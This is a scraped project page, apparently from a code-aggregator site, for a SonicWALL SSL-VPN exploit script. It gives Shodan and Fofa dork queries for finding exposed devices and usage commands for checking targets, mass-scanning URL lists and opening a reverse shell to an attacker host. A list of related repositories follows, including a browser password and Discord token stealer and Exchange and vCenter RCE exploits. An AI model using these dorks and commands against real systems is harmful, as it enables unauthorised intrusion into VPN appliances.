SonicWALL SSL-VPN Web Server Vulnerable Exploit

Last update: Nov 15, 2022

Overview

SonicWall_SSL-VPN_EXP

SonicWALL SSL-VPN Web Server Vulnerable Exploit

Dork

Shodan:

http.favicon.hash:-1153950306

http.favicon.hash:-2012355198

Fofa:

(body="login_box_sonicwall" || header="SonicWALL SSL-VPN Web Server") && body="SSL-VPN"

Usage

vulnerability verification for individual websites

python POC.py -u https://1.1.1.1

reverse shell to your VPS host

python POC.py -e https://1.1.1.1 -rh 2.2.2.2 -rp 9999

perform vulnerability checks on multiple websites in a file, and the vulnerable websites will be output to the success.txt file

python3 POC.py -f urls.txt

Reference

https://twitter.com/chybeta/status/1353974652540882944

https://darrenmartyn.ie/2021/01/24/visualdoor-sonicwall-ssl-vpn-exploit/

Owner

GitHub Repository

Malware arcane - Scripts and notes on my malware analysis journey

Malware Arcane Repository of notes and scripts I use when doing malware analysis

9 Jun 01, 2022

A web-app helping to create strong passwords that are easy to remember.

This is a simple Web-App that demonstrates a method of creating strong passwords that are still easy to remember. It also provides time estimates how long it would take an attacker to crack a passwor

2 Jun 04, 2021

A token logger for discord + steals Brave/Chrome passwords and usernames

Backdoor Machine - ❗ For educational purposes only ❗ A program made in python for stealing passwords and usernames from Google Chrome/Brave and tokenl

36 Jul 18, 2021

A python package with tools to read and postprocess the output of the channel DNS-solver (davecats/channel), as well as its associated postprocessing tools.

Python tools for davecats/channel A python package with tools to read and postprocess the output of the channel dns solver, as well as its associated

1 Dec 13, 2021

A small utility to deal with malware embedded hashes.

Uchihash is a small utility that can save malware analysts the time of dealing with embedded hash values used for various things such as: Dyn

48 Dec 19, 2022

Having a weak password is not good for a system that demands high confidentiality and security of user credentials

Having a weak password is not good for a system that demands high confidentiality and security of user credentials. It turns out that people find it difficult to make up a strong password that is str

0 Feb 07, 2022

A local Socks5 server written in python, used for integrating Multi-hop

proxy-Zata proxy-Zata v1.0 This is a local Socks5 server written in python, used for integrating Multi-hop (Socks4/Socks5/HTTP) forward proxy then pro

4 Feb 24, 2022

ThePhish: an automated phishing email analysis tool

ThePhish ThePhish is an automated phishing email analysis tool based on TheHive, Cortex and MISP. It is a web application written in Python 3 and base

675 Jan 03, 2023

test application for the licence key web app.

licence_software_test_app Make sure you set your database values in a .env file to the folder. Install MYSQL connector: pip install mysql-connector-py

1 Oct 28, 2021

Better-rtti-parser - IDA script to parse RTTI information in executable

RTTI parser Parses RTTI information from executable. Example HexRays decompiler view Before: After: Functions window Before: After: Structs window Ins

101 Jan 04, 2023

CVE-2021-22005 - VMWare vCenter Server File Upload to RCE

CVE-2021-22005 - VMWare vCenter Server File Upload to RCE Analyze Usage ------------------------------------------------------------- [*] CVE-2021-220

224 Aug 05, 2022

LinOTP - the open source solution for two factor authentication

462 Jan 02, 2023

In this program, I generate the strong password from existing password without class using python. The special thing in this program is that is generate very strong password from our existing password. It replaces some elements from password and put another elements in it.

Strong-password-Generator-from-existing-password-using-python In this program, I generate the strong password from existing password without class usi

4 Sep 24, 2021

SonicWALL SSL-VPN Web Server Vulnerable Exploit

Related tags

Overview

SonicWall_SSL-VPN_EXP

Dork

Usage

Reference

Owner

Malware arcane - Scripts and notes on my malware analysis journey

A web-app helping to create strong passwords that are easy to remember.

A token logger for discord + steals Brave/Chrome passwords and usernames

A python package with tools to read and postprocess the output of the channel DNS-solver (davecats/channel), as well as its associated postprocessing tools.

A small utility to deal with malware embedded hashes.

Having a weak password is not good for a system that demands high confidentiality and security of user credentials

A local Socks5 server written in python, used for integrating Multi-hop

ThePhish: an automated phishing email analysis tool

test application for the licence key web app.

Better-rtti-parser - IDA script to parse RTTI information in executable

CVE-2021-22005 - VMWare vCenter Server File Upload to RCE

LinOTP - the open source solution for two factor authentication

In this program, I generate the strong password from existing password without class using python. The special thing in this program is that is generate very strong password from our existing password. It replaces some elements from password and put another elements in it.

Downloads SEP, Baseband and BuildManifest automatically for signed iOS version's for connected iDevice

zip-brute Zip File Password Cracking with Using Password List

Safety checks your installed dependencies for known security vulnerabilities

Automatic ProxyShell Exploit

LeLeLe: A tool to simplify the application of Lattice attacks.

The RDT protocol (RDT3.0,GBN,SR) implementation and performance evaluation code using socket

ProxyShell POC Exploit : Exchange Server RCE (ACL Bypass + EoP + Arbitrary File Write)